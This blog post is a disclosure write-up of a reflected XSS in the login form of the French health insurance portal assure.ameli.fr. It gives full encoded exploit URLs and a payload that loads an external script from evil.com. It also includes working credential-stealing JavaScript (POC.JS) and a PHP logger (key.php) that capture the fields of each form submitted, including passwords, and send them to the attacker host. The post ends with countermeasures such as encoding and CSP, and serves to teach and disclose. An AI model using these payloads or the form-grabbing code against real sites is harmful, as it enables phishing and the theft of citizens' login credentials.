A fun case of XSS and other web concepts
25 Jul 2017Hello folks,
I would like to share with you a practical case of reflected XSS while i was looking at my national health service account. Right now the XSS has been patched (we have an efficient dedicated national service where we can report such issues).
What is the issue ?
A reflected XSS in the login field at the authentication page from the website https://assure.ameli.fr where all french citizen are consulting their social security account. Some digits are required but setting some alphacharacters as login will return the string in uppercase.
Where is the issue ?
So i set:

And i got:
<form name="connexionCompteForm" id="connexioncompte_2connexionCompteForm" method="post" action="https://assure.ameli.fr:443/PortailAS/appmanager/PortailAS/assure?_nfpb=true&_windowLabel=connexioncompte_2&connexioncompte_2_actionOverride=%2Fportlets%2Fconnexioncompte%2Fvalidationconnexioncompte&_pageLabel=as_login_page" class="r_cnx_form">
...
<input id="connexioncompte_2nir_as" type="text" value="THEPOSTLOGIN" maxlength="13" size="13" placeholder="Mon numéro de sécurité sociale" title="Mon numéro de sécurité sociale" tabindex="3" name="connexioncompte_2numSecuriteSociale" />
...
</form>
Let’s try something else with the login toto<>”’();/::
<input id="connexioncompte_2nir_as" type="text" value="TOTO<>"'();/\" maxlength="13" ...
No escaping, no sanitizing or HTML encoding but we will have to deal with UPPERCASE. HTML is not case sensitive but javascript is, so we will do some HEX encoding for the javascript part.
An important thing i forgot to mention is that the payload is truncated to 255 characters.
So this is how to exploit an XSS when your payload is UPPERCASED (and truncated):
First payload:
We can test the XSS thanks to this payload (alert) - also notice that we want to preserve the way how the webpage renders:
https://assure.ameli.fr/PortailAS/appmanager/PortailAS/assure?connexioncompte_2numSecuriteSociale=" /><IMG SRC=X ONERROR=alert(document.domain) hidden><nimp "&connexioncompte_2codeConfidentiel=&connexioncompte_2actionEvt=connecter
Full payload url encoded:
https://assure.ameli.fr/PortailAS/appmanager/PortailAS/assure?connexioncompte_2numSecuriteSociale=%22%20%2F%3E%3CIMG%20SRC%3DX%20ONERROR%3D%26%23x61%3B%26%23x6C%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B(%26%23x64%3B%26%23x6F%3B%26%23x63%3B%26%23x75%3B%26%23x6D%3B%26%23x65%3B%26%23x6E%3B%26%23x74%3B%26%23x2E%3B%26%23x64%3B%26%23x6F%3B%26%23x6D%3B%26%23x61%3B%26%23x69%3B%26%23x6E%3B)%20hidden%3E%3Cnimp%20%22&connexioncompte_2codeConfidentiel=&connexioncompte_2actionEvt=connecter
But wait… you process a GET request and you were talking about a form with POST method ?
Yes, there but there is no server-side filtering on the specific POST method (of course it’s also exploitable with POST).
So what do we have ?:

It works because i’m using Firefox. IE and Chrome embed a reflected XSS auditor which prevents this kind of inline javascript execution.
Now how to deal with a truncated payload ?:
Easy, we just have to call an external javascript file.
Final payload:
" name="connexioncompte_2numSecuriteSociale" placeholder="Mon numéro de sécurité sociale" /><script src='https://evil.com/poc/poc.js'></script><nimp "
Final payload url encoded:
https://assure.ameli.fr/PortailAS/appmanager/PortailAS/assure?connexioncompte_2numSecuriteSociale=%22%20name%3D%22connexioncompte_2numSecuriteSociale%22%20placeholder%3D%22%26%23x4d%3B%26%23x6f%3B%26%23x6e%3B%26%23x20%3B%26%23x6e%3B%26%23x75%3B%26%23x6d%3B%26%23xe9%3B%26%23x72%3B%26%23x6f%3B%26%23x20%3B%26%23x64%3B%26%23x65%3B%26%23x20%3B%26%23x73%3B%26%23xe9%3B%26%23x63%3B%26%23x75%3B%26%23x72%3B%26%23x69%3B%26%23x74%3B%26%23xe9%3B%26%23x20%3B%26%23x73%3B%26%23x6f%3B%26%23x63%3B%26%23x69%3B%26%23x61%3B%26%23x6c%3B%26%23x65%3B%22%20%2F%3E%3Cscript%20src%3D%27https%3A%2F%2Fevil.com%2Fpoc%2Fpoc.js%27%3E%3C%2Fscript%3E%3Cnimp%20%22&connexioncompte_2codeConfidentiel=&connexioncompte_2actionEvt=connecter
On our web server, we are creating the web tree POC/POC.JS (scheme and domain name are not case sensitive). But does a little bird sing the word CORS (Cross-Origin Resource Sharing)?
Here are some examples of resources which may be embedded cross-origin (https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy):
- JavaScript with
<script src="..."></script>. Error messages for syntax errors are only available for same-origin scripts. - CSS with
<link rel="stylesheet" href="...">. Due to the relaxed syntax rules of CSS, cross-origin CSS requires a correct Content-Type header. Restrictions vary by browser: IE, Firefox, Chrome, Safari (scroll down to CVE-2010-0051) and Opera. - Images with
<img>. Supported image formats include PNG, JPEG, GIF, BMP, SVG, … - Media files with
<video>and<audio>. - Plug-ins with
<object>,<embed>and<applet>. - Fonts with
@font-face. Some browsers allow cross-origin fonts, others require same-origin fonts. - Anything with
<frame>and<iframe>. A site can use the X-Frame-Options header to prevent this form of cross-origin interaction.
But in fact whatever… we are owning the web server we would be able to add if it was necessary the response header access-control-allow-origin: * for any resources.
But what kind of cool javascript payload can we inject? (knowing that the JSESSIONID cookie has the flag HttpOnly, so not accessible via javascript).

We will add a callback function that will be triggered once the forms on the webpage will be submitted (allowing us to capture the credentials).
Check https://github.com/phackt/pentest/tree/master/exploits/js_keylogger for source code.
POC.JS
window.onload = function () {
for(var i=0; i<document.forms.length; i++){
document.forms[i].addEventListener("submit", function() {
for(e=0; e<this.elements.length; e++){
keys = "[name:" + this.elements[e].name + ",value:" + this.elements[e].value + ",type:" + this.elements[e].type + "]";
new Image().src = 'https://evil.com/key.php?c='+keys;
}
}, false);
}
}
key.php
<?php
if(!empty($_GET['c'])) {
$logfile = fopen('data.txt', 'a+');
fwrite($logfile, $_GET['c']."\n");
fclose($logfile);
}
?>
So suppose you are receiving a link which exploits the XSS vulnerability and you innocently enter your credentials to check your account, the attacker will receive:
[name:CONNEXIONCOMPTE_2NUMSECURITESOCIALE,value:1234567890123,type:text]
[name:connexioncompte_2codeConfidentiel,value:89769874,type:password]
[name:connexioncompte_2actionEvt,value:connecter,type:hidden]
[name:submit,value:Valider,type:submit]
This kind of vulnerability could be part of a phishing campaign which encourages people to log in by clicking on the malicious link.
COUNTERMEASURES:
- HTML Encoding (HTML entities and numeric character references) - https://en.wikipedia.org/wiki/Character_encodings_in_HTML
- Sanitizing
- Escaping
- White-listing
- Block inline javascript via CSP (X-XSS-Protection is deprecated and will be replaced by the CSP directive Reflected-XSS)
Dealing with external resources, blocking all cross domains requests via a Content Security Policy rule may be not relevant because a lot of these resources are legitimate on a website.
However we can do some subtle CSP rules in order to allow only what is needed.
But if a web site administrator wants to allow only resources from the same origin (this excludes subdomains):
Content-Security-Policy: default-src 'self'
Web applications are really interesting because of all the concepts you have to deal with.
Hope you enjoyed.
Phackt.
